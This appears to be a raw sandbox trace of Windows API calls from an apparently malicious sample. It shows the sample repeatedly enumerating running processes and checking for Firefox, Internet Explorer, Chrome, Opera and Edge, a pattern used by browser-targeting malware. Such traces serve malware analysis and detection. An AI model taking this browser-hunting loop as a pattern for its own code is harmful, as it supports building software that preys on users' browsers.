lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0188.504] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0188.504] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0188.504] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0188.504] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0188.504] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.504] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0188.504] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0188.504] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0188.505] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0188.505] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0188.505] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.505] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0188.505] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0188.505] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0188.505] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0188.505] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0188.505] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.505] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0188.506] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0188.506] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0188.506] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0188.506] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0188.506] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.506] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0188.506] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0188.506] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0188.506] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0188.506] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0188.506] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.506] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0188.507] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0188.507] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0188.507] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0188.507] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0188.507] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.507] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0188.507] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0188.507] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0188.508] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0188.508] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0188.508] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.508] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0188.508] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0188.508] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0188.508] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0188.508] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0188.508] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.508] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0188.509] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0188.509] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0188.509] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0188.509] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0188.509] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.509] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0188.509] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0188.509] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0188.509] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0188.509] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0188.509] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.509] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0188.510] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0188.510] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0188.510] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0188.510] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0188.510] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.510] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0188.510] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0188.510] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0188.511] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0188.511] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0188.511] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.511] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0188.511] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0188.511] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0188.511] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0188.511] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0188.511] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.511] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.512] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0188.512] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0188.512] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0188.512] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0188.512] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.512] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.512] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.512] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.512] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.512] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.512] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.512] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0188.513] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0188.513] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0188.513] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0188.513] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0188.513] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.513] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.513] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.513] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.514] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.514] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.514] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.514] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0188.514] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0188.514] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0188.514] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0188.514] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0188.514] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.514] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.515] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.515] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.515] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.515] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0188.515] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.515] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.515] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0188.515] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0188.515] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0188.515] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0188.515] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.515] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0188.516] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0188.516] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0188.516] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0188.516] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0188.516] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.516] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.516] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0188.517] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0188.517] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0188.517] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0188.517] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.517] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.517] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0188.517] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0188.517] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0188.517] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0188.517] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.517] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.518] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0188.518] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0188.518] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0188.518] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0188.518] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.518] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.518] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0188.518] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0188.518] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0188.518] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0188.518] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.518] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.519] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0188.519] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0188.519] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0188.519] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0188.519] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.519] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0188.520] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0188.520] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0188.520] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0188.520] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0188.520] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0188.520] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0188.520] CloseHandle (hObject=0xe8) returned 1 [0188.520] Sleep (dwMilliseconds=0x3e8) [0189.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0189.566] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.567] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0189.567] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0189.567] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0189.567] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0189.567] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0189.567] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0189.567] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0189.567] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0189.567] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0189.567] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0189.567] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0189.567] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0189.568] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0189.568] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0189.568] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0189.568] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0189.568] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.568] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.568] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0189.568] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0189.568] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0189.568] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0189.569] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.569] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0189.569] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0189.569] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0189.569] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0189.569] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0189.569] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.569] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.570] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0189.570] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0189.570] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0189.570] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0189.570] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.570] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0189.570] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0189.570] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0189.570] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0189.570] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0189.570] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.570] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0189.571] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0189.571] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0189.571] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0189.571] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0189.571] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.571] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0189.571] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0189.571] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0189.571] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0189.571] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0189.571] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.571] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, 